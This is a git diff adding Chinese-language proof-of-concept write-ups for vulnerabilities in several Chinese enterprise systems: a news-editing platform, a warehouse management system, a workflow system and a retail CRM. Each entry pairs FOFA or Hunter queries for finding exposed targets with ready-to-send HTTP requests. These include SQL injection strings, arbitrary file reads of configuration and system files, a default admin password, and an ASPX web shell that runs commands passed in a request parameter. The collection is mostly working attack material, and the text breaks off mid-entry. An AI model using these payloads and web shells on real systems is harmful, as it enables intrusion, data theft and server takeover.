b/方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +## 方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞 + +方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞,未经身份验证的恶意攻击者利用SQL注入漏洞获取数据库中信息。 + +## fofa + +``` +app="FOUNDER-全媒体采编系统" +``` + +## poc + +```javascript +POST /newsedit/report/reportCenter.do HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Content-Type: application/x-www-form-urlencoded +Connection: close + +type=paperLayoutList&paperDate=2023-1-1&token=1&pageNo=1&pageSize=1&order=x' THEN 5 ELSE 5 END) AS status from (select '1x' as SYS_CURRENTSTATUS) d) tmp where cast(@@version as int)=5-- a +``` + diff --git a/方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞.md b/方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞.md new file mode 100644 index 0000000..f6e2edd --- /dev/null 
+++ b/方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +## 方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞 + +方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞,未经身份验证的恶意攻击者利用SQL注入漏洞获取数据库中信息。 + +## fofa + +```javascript +app="FOUNDER-全媒体采编系统" +``` + +## poc + +```javascript +POST /newsedit/newsplan/screen.do HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Content-Type: application/x-www-form-urlencoded +Connection: close + +method=getPaperLayoutList&pageNo=1&pageSize=5&paperDate=2022-11-30&paperIds=123+AND+2675+in+(select+@@version)&terminalType=123 +``` + diff --git a/时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞.md b/时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞.md new file mode 100644 index 0000000..26cfe25 --- /dev/null +++ b/时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞.md 
@@ -0,0 +1,29 @@ +# 时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞 + +时空WMS-仓储精细化管理系统 ImageAdd.ashx 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```javascript +body="SKControlKLForJson.ashx" +``` + +## poc + +```javascript +POST /ImageUpload/ImageAdd.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="file"; filename="rce.aspx" +Content-Type: text/plain + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundaryssh7UfnPpGU7BXfK-- +``` + +![image-20241206215719619](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062157774.png) \ No newline at end of file diff --git a/时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞.md b/时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞.md new file mode 100644 index 0000000..928b834 --- /dev/null +++ b/时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞.md 
@@ -0,0 +1,45 @@ +# 时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞 + +# 同一、漏洞简介 +时空WMS-仓储精细化 管理系统Q是一款高效、智能的仓储管理工具,旨在帮助企业实现仓库的精细化管理和高效运营。由郑州时空软件开发,专注于以数字化、智能化推动企业进步。该系统基于先进的仓储管理理念和技术架构,融合了物联网、移动互联等前沿技术,实现了对仓库内物资的全面、精准、高效管理。系统适用于各类仓储物流企业,包括电商仓储、第三方物流、生产仓储等多个领域。通过使用该系统,企业可以实现对仓库内物资的全面掌控和高效管理,提高库存周转率,降低库存成本,提升企业竞争优势。时空WMS-仓储精细化管理系统ImageAdd存在文件上传漏洞 + +# 二、影响版本 +```plain +时空WMS-仓储精细化管理系统 +``` + +# <font style="color:rgb(51, 51, 51);">三、资产测绘</font> ++ fofa`body="SKControlkLForJson.ashx"` ++ 特征 + +![1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370.png](./img/lbQy6c61cqR48Uxn/1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370-168361.png) + +# 四、漏洞复现 +```plain +POST /ImageUpload/ImageAdd.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="file"; filename="rce.aspx" +Content-Type: text/plain + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundaryssh7UfnPpGU7BXfK-- +``` + +![1733071883096-b7edb49c-40ac-40ee-abca-d3f58575a2ef.png](./img/lbQy6c61cqR48Uxn/1733071883096-b7edb49c-40ac-40ee-abca-d3f58575a2ef-148543.png) + +```plain +/upload/20241202/rce.aspx?cmd=whoami +``` + 
+![1733071908903-3da1d155-fb3d-4485-a9e6-a666ec6165b6.png](./img/lbQy6c61cqR48Uxn/1733071908903-3da1d155-fb3d-4485-a9e6-a666ec6165b6-485211.png) + + + +> 更新: 2024-12-20 14:53:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uuwme5gg6bcn6cym> \ No newline at end of file diff --git a/时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞.md b/时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞.md new file mode 100644 index 0000000..01b6809 --- /dev/null +++ b/时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞.md @@ -0,0 +1,29 @@ +# 时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞 + +时空WMS-仓储精细化管理系统 SaveCrash.ashx 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```javascript +body="SKControlKLForJson.ashx" +``` + +## poc + +```javascript +POST /crash/SaveCrash.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="file"; filename="rce.aspx" +Content-Type: text/plain + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundaryssh7UfnPpGU7BXfK-- +``` + +![image-20241206215936354](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062159415.png) \ No newline at end of file diff --git a/时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞.md b/时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞.md new file mode 100644 index 0000000..6661e0f 
--- /dev/null +++ b/时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞.md 
@@ -0,0 +1,45 @@ +# 时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞 + +# 一、漏洞简介 +时空WMS-仓储精细化 管理系统Q是一款高效、智能的仓储管理工具,旨在帮助企业实现仓库的精细化管理和高效运营。由郑州时空软件开发,专注于以数字化、智能化推动企业进步。该系统基于先进的仓储管理理念和技术架构,融合了物联网、移动互联等前沿技术,实现了对仓库内物资的全面、精准、高效管理。系统适用于各类仓储物流企业,包括电商仓储、第三方物流、生产仓储等多个领域。通过使用该系统,企业可以实现对仓库内物资的全面掌控和高效管理,提高库存周转率,降低库存成本,提升企业竞争优势。时空WMS-仓储精细化管理系统SaveCrash存在文件上传漏洞 + +# 二、影响版本 +```plain +锁群管理系统 V2.0 +``` + +# <font style="color:rgb(51, 51, 51);">三、资产测绘</font> ++ fofa`body="SKControlkLForJson.ashx"` ++ 特征 + +![1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370.png](./img/B_3LoGT3IdMx4D3i/1733071650019-13b87c7a-4d19-452b-ad2c-e2165a0ac370-919917.png) + +# 四、漏洞复现 +```plain +POST /crash/SaveCrash.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="file"; filename="rce.aspx" +Content-Type: text/plain + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundaryssh7UfnPpGU7BXfK-- +``` + +![1733071772492-82bae175-e317-4642-8d14-4522302fd265.png](./img/B_3LoGT3IdMx4D3i/1733071772492-82bae175-e317-4642-8d14-4522302fd265-876997.png) + +```plain +/crash/log/2024_12/133775453729140443.aspx?cmd=whoami +``` + 
+![1733071799074-e84bebd2-4d75-4825-a9e0-c963b7bf8319.png](./img/B_3LoGT3IdMx4D3i/1733071799074-e84bebd2-4d75-4825-a9e0-c963b7bf8319-510233.png) + + + +> 更新: 2024-12-20 14:53:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zbiltpbxr1s31uex> \ No newline at end of file diff --git a/时空智友企业流程化管控系统formserverSQL注入漏洞.md b/时空智友企业流程化管控系统formserverSQL注入漏洞.md new file mode 100644 index 0000000..50a6226 --- /dev/null +++ b/时空智友企业流程化管控系统formserverSQL注入漏洞.md @@ -0,0 +1,37 @@ +# 时空智友企业流程化管控系统formserverSQL注入漏洞 + +# 一、漏洞简介 +时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在SQL注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而绕过应用程序的访问控制和执行非法操作。 + +# 二、影响版本 ++ 时空智友企业流程化管控系统 + +# 三、资产测绘 ++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"` ++ 登录页面 + +![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/BCjbZh9dZ-Y2DPX1/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-910348.png) + +# 四、漏洞复现 +```plain +POST /formservice?service=workflow.sqlResult HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=123D902C244908C8DA7E61657166AA09; __qypid="" +Upgrade-Insecure-Requests: 1 +Content-Type: application/json +Content-Length: 50 + +{"params": {"a": "11"}, "sql": "select db_name()"} +``` + +![1693804111348-8e2c5b0f-d232-4a2a-8247-6c750648a466.png](./img/BCjbZh9dZ-Y2DPX1/1693804111348-8e2c5b0f-d232-4a2a-8247-6c750648a466-301099.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fg34lg8tq11uy1kp> \ No newline at end of file diff --git a/时空智友企业流程化管控系统formserver任意文件上传漏洞.md b/时空智友企业流程化管控系统formserver任意文件上传漏洞.md new file mode 100644 index 0000000..b04ef7f 
--- /dev/null +++ b/时空智友企业流程化管控系统formserver任意文件上传漏洞.md @@ -0,0 +1,53 @@ +# 时空智友企业流程化管控系统formserver任意文件上传漏洞 + +# 一、漏洞简介 +时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在任意文件上传漏洞,攻击者可通过系统或应用程序的漏洞将恶意文件上传到目标服务器上,导致目标服务器被攻击者控制。 + +# 二、影响版本 ++ 时空智友企业流程化管控系统 + +# 三、资产测绘 ++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"` ++ 登录页面 + +![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/KodiOhi15Unj7TlJ/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-152070.png) + +# 四、漏洞复现 +```plain +POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=BDC88B10942C62F82DA953E7503830B2; __qypid="" +Upgrade-Insecure-Requests: 1 +Content-Length: 229 + +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<html> +<head> + <title>JSP 输出 test 字符 + + + <%-- 使用 out 对象输出 test 字符 --%> + <%= "test" %> + + +``` + +![1693803668053-3bfeca2b-5e8d-4121-b209-644837708b2f.png](./img/KodiOhi15Unj7TlJ/1693803668053-3bfeca2b-5e8d-4121-b209-644837708b2f-555411.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/form/temp/202309043gwzr2x62hiiydrw_a.jsp +``` + +![1693803717058-b5c7886e-61db-4860-bf7b-3a07ddcdc5c4.png](./img/KodiOhi15Unj7TlJ/1693803717058-b5c7886e-61db-4860-bf7b-3a07ddcdc5c4-718010.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: \ No newline at end of file diff --git a/时空智友企业流程化管控系统login文件读取漏洞.md b/时空智友企业流程化管控系统login文件读取漏洞.md new file mode 100644 index 0000000..b99e740 --- /dev/null +++ b/时空智友企业流程化管控系统login文件读取漏洞.md 
@@ -0,0 +1,51 @@ +# 时空智友企业流程化管控系统 login 文件读取漏洞 + +# 一、漏洞简介 +时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统login 文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息等。 + +# 二、影响版本 ++ 时空智友企业流程化管控系统 + +# 三、资产测绘 ++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"` ++ 登录页面 + +![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/vMGuM8abSzeyEALd/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-515017.png) + +# 四、漏洞复现 +```plain +POST /login HTTP/1.1 +Host: xx.xx.xx.xx +Content-Length: 100 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +op=verify%7Clogin&targetpage=&errorpage=/WEB-INF/dwr.xml&mark=&tzo=480&username=admin&password=admin +``` + +![1700038270810-cb915d8f-d0a9-438a-bc87-e7e74156706a.png](./img/vMGuM8abSzeyEALd/1700038270810-cb915d8f-d0a9-438a-bc87-e7e74156706a-083560.png) + +```plain +POST /login HTTP/1.1 +Host: XX.XX.XX.XX +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzi +Content-Length: 111 + +op=verify%7Clogin&targetpage=&errorpage=WEB-INF/classes/proxool.xml&mark=&tzo=480&username=admin&password=admin +``` + + + +> 更新: 2024-02-29 23:55:50 +> 原文: \ No newline at end of file diff --git a/时空智友企业流程化管控系统manage敏感信息泄露漏洞.md b/时空智友企业流程化管控系统manage敏感信息泄露漏洞.md new file mode 100644 index 0000000..36e4271 --- /dev/null +++ b/时空智友企业流程化管控系统manage敏感信息泄露漏洞.md 
@@ -0,0 +1,25 @@ +# 时空智友企业流程化管控系统manage敏感信息泄露漏洞 + +# 一、漏洞简介 +时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统敏感信息泄露,攻击者可通过此漏洞获取敏感信息。 + +# 二、影响版本 ++ 时空智友企业流程化管控系统 + +# 三、资产测绘 ++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"` ++ 登录页面 + +![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/rxKtzkM-r8wfTNx6/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-099545.png) + +# 四、漏洞复现 +```plain +/manage/index.jsp +``` + +![1700037663571-3c18c7c2-ca30-4334-9668-8676d65805b1.png](./img/rxKtzkM-r8wfTNx6/1700037663571-3c18c7c2-ca30-4334-9668-8676d65805b1-103789.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: \ No newline at end of file diff --git a/时空智友企业流程化管控系统wc.db文件信息泄露漏洞.md b/时空智友企业流程化管控系统wc.db文件信息泄露漏洞.md new file mode 100644 index 0000000..64a996c --- /dev/null +++ b/时空智友企业流程化管控系统wc.db文件信息泄露漏洞.md @@ -0,0 +1,27 @@ +# 时空智友企业流程化管控系统 wc.db 文件信息泄露漏洞 + +# 一、漏洞简介 +时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统wc.db 信息泄露漏洞,攻击者可利用该漏洞获取系统的敏感信息等。 + +# 二、影响版本 ++ 时空智友企业流程化管控系统 + +# 三、资产测绘 ++ hunter`web.icon=="2464cbce5dd2681dd4fb62d055520d78"` ++ 登录页面 + +![1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3.png](./img/3z7RiAKSWsW-y6Hd/1693803612908-2a0fea76-532f-4ba1-87fa-4fc6bfae5cf3-562783.png) + +# 四、漏洞复现 +```plain +/.svn/wc.db +``` + +![1700037972185-dc8d2b6d-f3aa-4354-8353-465fdc8c6843.png](./img/3z7RiAKSWsW-y6Hd/1700037972185-dc8d2b6d-f3aa-4354-8353-465fdc8c6843-909643.png) + +![1700037948655-5e46987b-654c-4b4c-871d-4cc9ea516a3b.png](./img/3z7RiAKSWsW-y6Hd/1700037948655-5e46987b-654c-4b4c-871d-4cc9ea516a3b-312136.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: \ No newline at end of file diff --git a/时空物流运输管理系统存在敏感信息泄露漏洞.md b/时空物流运输管理系统存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..b1bb7fa --- /dev/null +++ b/时空物流运输管理系统存在敏感信息泄露漏洞.md 
@@ -0,0 +1,17 @@ +# 时空物流运输管理系统存在敏感信息泄露漏洞 +时空物流运输管理系统存在敏感信息泄露漏洞 + +## fofa +```rust +body="/Images/ManLogin/name.png" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735477340408-41d21d71-9f58-4612-8ef5-4a91da7874c7.png) + +## poc +```rust +/ManLogin/SysData +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735477463215-4ec0d8fe-e862-4f71-b56e-67159ca9c1e3.png) + diff --git a/时间精细化管理平台存在弱口令漏洞.md b/时间精细化管理平台存在弱口令漏洞.md new file mode 100644 index 0000000..6e0c6f4 --- /dev/null +++ b/时间精细化管理平台存在弱口令漏洞.md @@ -0,0 +1,24 @@ +# 时间精细化管理平台存在弱口令漏洞 + +# 一、漏洞简介 +时间精细化管理平台存在弱口令漏洞,攻击者可通过该漏洞获取应用系统管理员权限。 + +# 二、影响版本 ++ 时间精细化管理平台 + +# 三、资产测绘 ++ hunter`web.body="/iclock/accounts/login/"` ++ 特征 + +![1701768019740-2dc4a787-7f61-4957-852f-e0587bbe36cc.png](./img/j-xB77lRB68YH5-q/1701768019740-2dc4a787-7f61-4957-852f-e0587bbe36cc-705595.png) + +# 四、漏洞复现 ++ 弱口令 ++ admin/123456、admin/111111 + +![1701768055250-594cedfb-7d30-40a7-b49e-5e352cfab407.png](./img/j-xB77lRB68YH5-q/1701768055250-594cedfb-7d30-40a7-b49e-5e352cfab407-222086.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: \ No newline at end of file diff --git a/昂捷CRMcwsfiledown存在任意文件读取漏洞.md b/昂捷CRMcwsfiledown存在任意文件读取漏洞.md new file mode 100644 index 0000000..ba39b9b --- /dev/null +++ b/昂捷CRMcwsfiledown存在任意文件读取漏洞.md 
@@ -0,0 +1,43 @@ +# 昂捷CRM cwsfiledown存在任意文件读取漏洞 + +# 一、漏洞简介 +昂捷CRM (Customer Relationship Management) 是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度,从而推动业务增长,该系统集成了客户信息管理、会员营销、客户服务等多个功能模块,为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsfiledown存在任意文件读取漏洞 + +# 二、影响版本 +```plain +昂捷CRM +``` + +# 三、资产测绘 ++ fofa`body="/ClientBin/slEnjoy.App.xap"` ++ 特征 + +![1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135.png](./img/_tSJqR4iociFGCpX/1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135-940796.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/DownFileBytes" + + + + + + c://windows//win.ini + 1 + 100 + ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg + + + +``` + +![1732852903103-dc8fee22-2072-4144-87f5-54115f4c75e2.png](./img/_tSJqR4iociFGCpX/1732852903103-dc8fee22-2072-4144-87f5-54115f4c75e2-049077.png) + + + +> 更新: 2024-12-20 14:53:56 +> 原文: \ No newline at end of file diff --git a/昂捷CRMcwsuploadpicture存在任意文件读取漏洞.md b/昂捷CRMcwsuploadpicture存在任意文件读取漏洞.md new file mode 100644 index 0000000..a274425 --- /dev/null +++ b/昂捷CRMcwsuploadpicture存在任意文件读取漏洞.md 
@@ -0,0 +1,39 @@ +# 昂捷CRM cwsuploadpicture存在任意文件读取漏洞 + +# 一、漏洞简介 +昂捷CRM (Customer Relationship Management) 是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度,从而推动业务增长,该系统集成了客户信息管理、会员营销、客户服务等多个功能模块,为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsuploadpicture存在任意文件读取漏洞 + +# 二、影响版本 +```plain +昂捷CRM +``` + +# 三、资产测绘 ++ fofa`body="/ClientBin/slEnjoy.App.xap"` ++ 特征 + +![1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135.png](./img/RiIKMjX_0E9dc_82/1732852842698-06314946-c4c6-4d0b-9bae-51ed78196135-997434.png) + +# 四、漏洞复现 +```plain +POST /enjoyRMIS_WS/WS/Common/cwsuploadpicture.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +SOAPAction: "http://tempuri.org/GetPicture" + + + + + + c:/windows/win.ini + + + +``` + +![1734600358846-57a27a23-cf9a-4b3b-8507-945c7b3d6841.png](./img/RiIKMjX_0E9dc_82/1734600358846-57a27a23-cf9a-4b3b-8507-945c7b3d6841-315491.png) + + + +> 更新: 2024-12-20 14:53:56 +> 原文: \ No newline at end of file diff --git a/昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md b/昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md new file mode 100644 index 0000000..cf775bb --- /dev/null +++ b/昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md 
@@ -0,0 +1,33 @@ +# 昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞 + +昂捷CRM(Customer Relationship Management)是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度,从而推动业务增长。该系统集成了客户信息管理、会员营销、客户服务等多个功能模块,为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsfiledown.asmx 接口DownFileBytes实例处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件 + +## fofa + +```javascript +body="/ClientBin/slEnjoy.App.xap" +``` + +## poc + +```xml +POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/DownFileBytes" + + + + + + c://windows//win.ini + 1 + 100 + ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg + + + +``` + +![image-20241128094832675](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280948742.png) \ No newline at end of file diff --git a/昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞.md b/昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞.md new file mode 100644 index 0000000..6af084b --- /dev/null +++ b/昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞.md @@ -0,0 +1,29 @@ +# 昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞 + +昂捷CRM(Customer Relationship 